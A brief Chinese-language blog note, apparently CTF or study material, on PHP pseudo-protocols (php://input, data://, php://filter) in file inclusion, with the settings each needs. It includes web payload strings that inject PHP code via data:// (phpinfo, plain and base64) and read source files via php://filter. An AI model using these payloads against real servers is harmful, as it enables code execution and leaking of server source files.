伪协议

php://input

allow_ _url_ include选项必须设置为on,否则无法成功,此时allow_ url_ fopen是否开启无关紧要。

php:/input是用来接收post数据的

典型: file_ get contents()函数, 配置开关不受影响

enctype="multipart/form-data"的时候php://input是无效

data://

allow_ url_ include与allow_ url_ fopen选项必须设置为on

用法:

data://text/plain, < ?php phpinfo()?>

data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

或者

data:text/plain, <?php phpinfo()?>

data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

php://filter

用法:php://filter/read=convert.base64-encode/resource=[文件路径]

posted @ 2024-10-16 19:27  x’c  阅读(29)  评论(0)    收藏  举报